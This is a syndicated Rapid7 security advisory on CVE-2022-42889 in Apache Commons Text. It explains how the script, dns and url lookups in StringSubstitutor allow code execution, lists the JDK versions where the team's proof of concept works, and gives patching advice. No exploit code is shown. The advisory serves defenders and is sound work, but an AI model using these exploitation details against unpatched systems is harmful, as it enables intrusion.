If you have feedback about this blog post, submit comments in the Comments section below. You can also start a new thread on re:Post to get answers from the community.

Want more AWS Security news? Follow us on Twitter.

Michael Davie

Michael Davie

Michael is a Senior Industry Specialist with AWS Security Assurance. He works with our customers, their regulators, and AWS teams to help raise the bar on secure cloud adoption and usage. Michael has over 20 years of experience working in the defence, intelligence, and technology sectors in Canada and is a licensed professional engineer.

CVE-2022-42889: Keep Calm and Stop Saying “4Shell”

Post Syndicated from Erick Galinkin original https://blog.rapid7.com/2022/10/17/cve-2022-42889-keep-calm-and-stop-saying-4shell/

CVE-2022-42889: Keep Calm and Stop Saying

CVE-2022-42889, which some have begun calling “Text4Shell,” is a vulnerability in the popular Apache Commons Text library that can result in code execution when processing malicious input. The vulnerability was announced on October 13, 2022 on the Apache dev list. CVE-2022-42889 arises from insecure implementation of Commons Text’s variable interpolation functionality—more specifically, some default lookup strings could potentially accept untrusted input from remote attackers, such as DNS requests, URLs, or inline scripts.

CVE-2022-42889 affects Apache Commons Text versions 1.5 through 1.9. It has been patched as of Commons Text version 1.10.

The vulnerability has been compared to Log4Shell since it is an open-source library-level vulnerability that is likely to impact a wide variety of software applications that use the relevant object. However, initial analysis indicates that this is a bad comparison. The nature of the vulnerability means that unlike Log4Shell, it will be rare that an application uses the vulnerable component of Commons Text to process untrusted, potentially malicious input. Additionally, JDK version matters for exploitability. Our team tested their proof-of-concept exploit across the following JDK versions:

  • JDK 1.8.0_341 – PoC works
  • JDK 9.0.4 – PoC works
  • JDK 10.0.2 – PoC works
  • JDK 11.0.16.1 – warning but works
  • JDK 12.0.2 – warning but works
  • JDK 13.0.2 – warning but works
  • JDK 14.0.2 – warning but works
  • JDK 15.0.2 – fails
  • JDK 16.0.2 – fails
  • JDK 17.0.4.1 – fails
  • JDK 18.0.2.1 – fails
  • JDK 19 – fails

Results were identical for OpenJDK.

In summary, much like with Spring4Shell, there are significant caveats to practical exploitability for CVE-2022-42889. With that said, we still recommend patching any relevant impacted software according to your normal, hair-not-on-fire patch cycle.

Technical analysis

The vulnerability exists in the StringSubstitutor interpolator object. An interpolator is created by the StringSubstitutor.createInterpolator() method and will allow for string lookups as defined in the StringLookupFactory. This can be used by passing a string “${prefix:name}” where the prefix is the aforementioned lookup. Using the “script”, “dns”, or “url” lookups would allow a crafted string to execute arbitrary scripts when passed to the interpolator object.

Since Commons Text is a library, the specific usage of the interpolator will dictate the impact of this vulnerability. As a toy proof of concept, consider:

CVE-2022-42889: Keep Calm and Stop Saying

While this specific code fragment is unlikely to exist in production applications, the concern is that in some applications, the `pocstring` variable may be attacker-controlled. In this sense, the vulnerability echoes Log4Shell. However, the StringSubstitutor interpolator is considerably less widely used than the vulnerable string substitution in Log4j and the nature of such an interpolator means that getting crafted input to the vulnerable object is less likely than merely interacting with such a crafted string as in Log4Shell.

Mitigation guidance

Organizations who have direct dependencies on Apache Commons Text should upgrade to the fixed version (1.10.0). As with most library vulnerabilities, we will see the usual tail of follow-on vendor advisories with upgrades for products that package vulnerable implementations of the library. We recommend that you install these patches as they become available, and prioritize any where the vendor indicates that their implementation may be remotely exploitable.

Rapid7 customers

Our engineering team is evaluating the feasibility of a vulnerability check.

The collective thoughts of the interwebz

By continuing to use the site, you agree to the use of cookies. more information

The cookie settings on this website are set to "allow cookies" to give you the best browsing experience possible. If you continue to use this website without changing your cookie settings or you click "Accept" below then you are consenting to this.

Close